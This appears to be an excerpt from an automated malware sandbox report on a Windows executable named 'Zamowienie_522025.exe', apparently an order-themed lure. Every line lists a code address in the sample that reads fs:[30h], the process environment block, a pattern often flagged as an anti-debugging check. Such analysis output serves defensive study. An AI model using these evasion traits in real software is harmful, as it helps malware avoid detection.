Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324B3370 mov eax, dword ptr fs:[00000030h]	9_2_324B3370
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3249930B mov eax, dword ptr fs:[00000030h]	9_2_3249930B
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3249930B mov eax, dword ptr fs:[00000030h]	9_2_3249930B
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3249930B mov eax, dword ptr fs:[00000030h]	9_2_3249930B
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324D132D mov eax, dword ptr fs:[00000030h]	9_2_324D132D
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324D132D mov eax, dword ptr fs:[00000030h]	9_2_324D132D
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3243F32A mov eax, dword ptr fs:[00000030h]	9_2_3243F32A
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32407330 mov eax, dword ptr fs:[00000030h]	9_2_32407330
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324CB3D0 mov ecx, dword ptr fs:[00000030h]	9_2_324CB3D0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324CF3E6 mov eax, dword ptr fs:[00000030h]	9_2_324CF3E6
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324E53FC mov eax, dword ptr fs:[00000030h]	9_2_324E53FC
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324E539D mov eax, dword ptr fs:[00000030h]	9_2_324E539D
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3246739A mov eax, dword ptr fs:[00000030h]	9_2_3246739A
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3246739A mov eax, dword ptr fs:[00000030h]	9_2_3246739A
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324433A0 mov eax, dword ptr fs:[00000030h]	9_2_324433A0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324433A0 mov eax, dword ptr fs:[00000030h]	9_2_324433A0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324333A5 mov eax, dword ptr fs:[00000030h]	9_2_324333A5
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324B13B9 mov eax, dword ptr fs:[00000030h]	9_2_324B13B9
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324B13B9 mov eax, dword ptr fs:[00000030h]	9_2_324B13B9
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324B13B9 mov eax, dword ptr fs:[00000030h]	9_2_324B13B9
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3243B052 mov eax, dword ptr fs:[00000030h]	9_2_3243B052
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324B705E mov ebx, dword ptr fs:[00000030h]	9_2_324B705E
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324B705E mov eax, dword ptr fs:[00000030h]	9_2_324B705E
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3249106E mov eax, dword ptr fs:[00000030h]	9_2_3249106E
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324E5060 mov eax, dword ptr fs:[00000030h]	9_2_324E5060
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32421070 mov eax, dword ptr fs:[00000030h]	9_2_32421070
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32421070 mov ecx, dword ptr fs:[00000030h]	9_2_32421070
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32421070 mov eax, dword ptr fs:[00000030h]	9_2_32421070
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32421070 mov eax, dword ptr fs:[00000030h]	9_2_32421070
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32421070 mov eax, dword ptr fs:[00000030h]	9_2_32421070
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32421070 mov eax, dword ptr fs:[00000030h]	9_2_32421070
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32421070 mov eax, dword ptr fs:[00000030h]	9_2_32421070
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32421070 mov eax, dword ptr fs:[00000030h]	9_2_32421070
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32421070 mov eax, dword ptr fs:[00000030h]	9_2_32421070
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32421070 mov eax, dword ptr fs:[00000030h]	9_2_32421070
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32421070 mov eax, dword ptr fs:[00000030h]	9_2_32421070
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32421070 mov eax, dword ptr fs:[00000030h]	9_2_32421070
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32421070 mov eax, dword ptr fs:[00000030h]	9_2_32421070
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3248D070 mov ecx, dword ptr fs:[00000030h]	9_2_3248D070
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324D903E mov eax, dword ptr fs:[00000030h]	9_2_324D903E
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324D903E mov eax, dword ptr fs:[00000030h]	9_2_324D903E
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324D903E mov eax, dword ptr fs:[00000030h]	9_2_324D903E
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324D903E mov eax, dword ptr fs:[00000030h]	9_2_324D903E
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324270C0 mov eax, dword ptr fs:[00000030h]	9_2_324270C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324270C0 mov ecx, dword ptr fs:[00000030h]	9_2_324270C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324270C0 mov ecx, dword ptr fs:[00000030h]	9_2_324270C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324270C0 mov eax, dword ptr fs:[00000030h]	9_2_324270C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324270C0 mov ecx, dword ptr fs:[00000030h]	9_2_324270C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324270C0 mov ecx, dword ptr fs:[00000030h]	9_2_324270C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324270C0 mov eax, dword ptr fs:[00000030h]	9_2_324270C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324270C0 mov eax, dword ptr fs:[00000030h]	9_2_324270C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324270C0 mov eax, dword ptr fs:[00000030h]	9_2_324270C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324270C0 mov eax, dword ptr fs:[00000030h]	9_2_324270C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324270C0 mov eax, dword ptr fs:[00000030h]	9_2_324270C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324270C0 mov eax, dword ptr fs:[00000030h]	9_2_324270C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324270C0 mov eax, dword ptr fs:[00000030h]	9_2_324270C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324270C0 mov eax, dword ptr fs:[00000030h]	9_2_324270C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324270C0 mov eax, dword ptr fs:[00000030h]	9_2_324270C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324270C0 mov eax, dword ptr fs:[00000030h]	9_2_324270C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324270C0 mov eax, dword ptr fs:[00000030h]	9_2_324270C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324270C0 mov eax, dword ptr fs:[00000030h]	9_2_324270C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3248D0C0 mov eax, dword ptr fs:[00000030h]	9_2_3248D0C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3248D0C0 mov eax, dword ptr fs:[00000030h]	9_2_3248D0C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324E50D9 mov eax, dword ptr fs:[00000030h]	9_2_324E50D9
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324390DB mov eax, dword ptr fs:[00000030h]	9_2_324390DB
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324350E4 mov eax, dword ptr fs:[00000030h]	9_2_324350E4
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324350E4 mov ecx, dword ptr fs:[00000030h]	9_2_324350E4
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3249D080 mov eax, dword ptr fs:[00000030h]	9_2_3249D080
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3249D080 mov eax, dword ptr fs:[00000030h]	9_2_3249D080
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240D08D mov eax, dword ptr fs:[00000030h]	9_2_3240D08D
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3243D090 mov eax, dword ptr fs:[00000030h]	9_2_3243D090
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3243D090 mov eax, dword ptr fs:[00000030h]	9_2_3243D090
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32415096 mov eax, dword ptr fs:[00000030h]	9_2_32415096
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3244909C mov eax, dword ptr fs:[00000030h]	9_2_3244909C
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32409148 mov eax, dword ptr fs:[00000030h]	9_2_32409148
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32409148 mov eax, dword ptr fs:[00000030h]	9_2_32409148
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32409148 mov eax, dword ptr fs:[00000030h]	9_2_32409148
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32409148 mov eax, dword ptr fs:[00000030h]	9_2_32409148
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324A3140 mov eax, dword ptr fs:[00000030h]	9_2_324A3140
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324A3140 mov eax, dword ptr fs:[00000030h]	9_2_324A3140
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324A3140 mov eax, dword ptr fs:[00000030h]	9_2_324A3140
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32417152 mov eax, dword ptr fs:[00000030h]	9_2_32417152
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324E5152 mov eax, dword ptr fs:[00000030h]	9_2_324E5152
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F172 mov eax, dword ptr fs:[00000030h]	9_2_3240F172
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F172 mov eax, dword ptr fs:[00000030h]	9_2_3240F172
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F172 mov eax, dword ptr fs:[00000030h]	9_2_3240F172
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F172 mov eax, dword ptr fs:[00000030h]	9_2_3240F172
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F172 mov eax, dword ptr fs:[00000030h]	9_2_3240F172
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F172 mov eax, dword ptr fs:[00000030h]	9_2_3240F172
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F172 mov eax, dword ptr fs:[00000030h]	9_2_3240F172
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F172 mov eax, dword ptr fs:[00000030h]	9_2_3240F172
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F172 mov eax, dword ptr fs:[00000030h]	9_2_3240F172
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F172 mov eax, dword ptr fs:[00000030h]	9_2_3240F172
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F172 mov eax, dword ptr fs:[00000030h]	9_2_3240F172
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F172 mov eax, dword ptr fs:[00000030h]	9_2_3240F172
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F172 mov eax, dword ptr fs:[00000030h]	9_2_3240F172
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F172 mov eax, dword ptr fs:[00000030h]	9_2_3240F172
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F172 mov eax, dword ptr fs:[00000030h]	9_2_3240F172
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F172 mov eax, dword ptr fs:[00000030h]	9_2_3240F172
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F172 mov eax, dword ptr fs:[00000030h]	9_2_3240F172
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F172 mov eax, dword ptr fs:[00000030h]	9_2_3240F172
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F172 mov eax, dword ptr fs:[00000030h]	9_2_3240F172
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F172 mov eax, dword ptr fs:[00000030h]	9_2_3240F172
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F172 mov eax, dword ptr fs:[00000030h]	9_2_3240F172
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324A9179 mov eax, dword ptr fs:[00000030h]	9_2_324A9179
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32411131 mov eax, dword ptr fs:[00000030h]	9_2_32411131
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32411131 mov eax, dword ptr fs:[00000030h]	9_2_32411131
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240B136 mov eax, dword ptr fs:[00000030h]	9_2_3240B136
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240B136 mov eax, dword ptr fs:[00000030h]	9_2_3240B136
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240B136 mov eax, dword ptr fs:[00000030h]	9_2_3240B136
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240B136 mov eax, dword ptr fs:[00000030h]	9_2_3240B136
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324E51CB mov eax, dword ptr fs:[00000030h]	9_2_324E51CB
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3244D1D0 mov eax, dword ptr fs:[00000030h]	9_2_3244D1D0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3244D1D0 mov ecx, dword ptr fs:[00000030h]	9_2_3244D1D0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324351EF mov eax, dword ptr fs:[00000030h]	9_2_324351EF
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324351EF mov eax, dword ptr fs:[00000030h]	9_2_324351EF
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324351EF mov eax, dword ptr fs:[00000030h]	9_2_324351EF
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324351EF mov eax, dword ptr fs:[00000030h]	9_2_324351EF
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324351EF mov eax, dword ptr fs:[00000030h]	9_2_324351EF
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324351EF mov eax, dword ptr fs:[00000030h]	9_2_324351EF
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324351EF mov eax, dword ptr fs:[00000030h]	9_2_324351EF
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324351EF mov eax, dword ptr fs:[00000030h]	9_2_324351EF
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324351EF mov eax, dword ptr fs:[00000030h]	9_2_324351EF
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324351EF mov eax, dword ptr fs:[00000030h]	9_2_324351EF
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324351EF mov eax, dword ptr fs:[00000030h]	9_2_324351EF
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324351EF mov eax, dword ptr fs:[00000030h]	9_2_324351EF
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324351EF mov eax, dword ptr fs:[00000030h]	9_2_324351EF
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324151ED mov eax, dword ptr fs:[00000030h]	9_2_324151ED
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324B71F9 mov esi, dword ptr fs:[00000030h]	9_2_324B71F9
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324C5180 mov eax, dword ptr fs:[00000030h]	9_2_324C5180
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324C5180 mov eax, dword ptr fs:[00000030h]	9_2_324C5180
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32467190 mov eax, dword ptr fs:[00000030h]	9_2_32467190
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324C11A4 mov eax, dword ptr fs:[00000030h]	9_2_324C11A4
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324C11A4 mov eax, dword ptr fs:[00000030h]	9_2_324C11A4
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324C11A4 mov eax, dword ptr fs:[00000030h]	9_2_324C11A4
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324C11A4 mov eax, dword ptr fs:[00000030h]	9_2_324C11A4
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3242B1B0 mov eax, dword ptr fs:[00000030h]	9_2_3242B1B0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32449660 mov eax, dword ptr fs:[00000030h]	9_2_32449660
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32449660 mov eax, dword ptr fs:[00000030h]	9_2_32449660
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324AD660 mov eax, dword ptr fs:[00000030h]	9_2_324AD660
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32441607 mov eax, dword ptr fs:[00000030h]	9_2_32441607
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3244F603 mov eax, dword ptr fs:[00000030h]	9_2_3244F603
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32413616 mov eax, dword ptr fs:[00000030h]	9_2_32413616
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32413616 mov eax, dword ptr fs:[00000030h]	9_2_32413616
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F626 mov eax, dword ptr fs:[00000030h]	9_2_3240F626
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F626 mov eax, dword ptr fs:[00000030h]	9_2_3240F626
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F626 mov eax, dword ptr fs:[00000030h]	9_2_3240F626
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F626 mov eax, dword ptr fs:[00000030h]	9_2_3240F626
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F626 mov eax, dword ptr fs:[00000030h]	9_2_3240F626
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F626 mov eax, dword ptr fs:[00000030h]	9_2_3240F626
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F626 mov eax, dword ptr fs:[00000030h]	9_2_3240F626
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F626 mov eax, dword ptr fs:[00000030h]	9_2_3240F626
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F626 mov eax, dword ptr fs:[00000030h]	9_2_3240F626
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324E5636 mov eax, dword ptr fs:[00000030h]	9_2_324E5636
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3241B6C0 mov eax, dword ptr fs:[00000030h]	9_2_3241B6C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3241B6C0 mov eax, dword ptr fs:[00000030h]	9_2_3241B6C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3241B6C0 mov eax, dword ptr fs:[00000030h]	9_2_3241B6C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3241B6C0 mov eax, dword ptr fs:[00000030h]	9_2_3241B6C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3241B6C0 mov eax, dword ptr fs:[00000030h]	9_2_3241B6C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3241B6C0 mov eax, dword ptr fs:[00000030h]	9_2_3241B6C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324D16CC mov eax, dword ptr fs:[00000030h]	9_2_324D16CC
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324D16CC mov eax, dword ptr fs:[00000030h]	9_2_324D16CC
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324D16CC mov eax, dword ptr fs:[00000030h]	9_2_324D16CC
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324D16CC mov eax, dword ptr fs:[00000030h]	9_2_324D16CC
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324CF6C7 mov eax, dword ptr fs:[00000030h]	9_2_324CF6C7
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324416CF mov eax, dword ptr fs:[00000030h]	9_2_324416CF
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3243D6E0 mov eax, dword ptr fs:[00000030h]	9_2_3243D6E0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3243D6E0 mov eax, dword ptr fs:[00000030h]	9_2_3243D6E0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324A36EE mov eax, dword ptr fs:[00000030h]	9_2_324A36EE
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324A36EE mov eax, dword ptr fs:[00000030h]	9_2_324A36EE
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324A36EE mov eax, dword ptr fs:[00000030h]	9_2_324A36EE
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324A36EE mov eax, dword ptr fs:[00000030h]	9_2_324A36EE
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324A36EE mov eax, dword ptr fs:[00000030h]	9_2_324A36EE
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324A36EE mov eax, dword ptr fs:[00000030h]	9_2_324A36EE
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324436EF mov eax, dword ptr fs:[00000030h]	9_2_324436EF
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324CD6F0 mov eax, dword ptr fs:[00000030h]	9_2_324CD6F0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3249368C mov eax, dword ptr fs:[00000030h]	9_2_3249368C
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3249368C mov eax, dword ptr fs:[00000030h]	9_2_3249368C
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3249368C mov eax, dword ptr fs:[00000030h]	9_2_3249368C
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3249368C mov eax, dword ptr fs:[00000030h]	9_2_3249368C
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240D6AA mov eax, dword ptr fs:[00000030h]	9_2_3240D6AA
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240D6AA mov eax, dword ptr fs:[00000030h]	9_2_3240D6AA
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324076B2 mov eax, dword ptr fs:[00000030h]	9_2_324076B2
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324076B2 mov eax, dword ptr fs:[00000030h]	9_2_324076B2
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324076B2 mov eax, dword ptr fs:[00000030h]	9_2_324076B2
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32423740 mov eax, dword ptr fs:[00000030h]	9_2_32423740
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32423740 mov eax, dword ptr fs:[00000030h]	9_2_32423740
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32423740 mov eax, dword ptr fs:[00000030h]	9_2_32423740
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324E3749 mov eax, dword ptr fs:[00000030h]	9_2_324E3749
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324B375F mov eax, dword ptr fs:[00000030h]	9_2_324B375F
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324B375F mov eax, dword ptr fs:[00000030h]	9_2_324B375F
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324B375F mov eax, dword ptr fs:[00000030h]	9_2_324B375F
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324B375F mov eax, dword ptr fs:[00000030h]	9_2_324B375F
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324B375F mov eax, dword ptr fs:[00000030h]	9_2_324B375F
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240B765 mov eax, dword ptr fs:[00000030h]	9_2_3240B765
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240B765 mov eax, dword ptr fs:[00000030h]	9_2_3240B765
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240B765 mov eax, dword ptr fs:[00000030h]	9_2_3240B765
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240B765 mov eax, dword ptr fs:[00000030h]	9_2_3240B765
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32417703 mov eax, dword ptr fs:[00000030h]	9_2_32417703
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32415702 mov eax, dword ptr fs:[00000030h]	9_2_32415702
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32415702 mov eax, dword ptr fs:[00000030h]	9_2_32415702
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3244F71F mov eax, dword ptr fs:[00000030h]	9_2_3244F71F
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3244F71F mov eax, dword ptr fs:[00000030h]	9_2_3244F71F
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32413720 mov eax, dword ptr fs:[00000030h]	9_2_32413720
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3242F720 mov eax, dword ptr fs:[00000030h]	9_2_3242F720
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3242F720 mov eax, dword ptr fs:[00000030h]	9_2_3242F720
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3242F720 mov eax, dword ptr fs:[00000030h]	9_2_3242F720
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324CF72E mov eax, dword ptr fs:[00000030h]	9_2_324CF72E
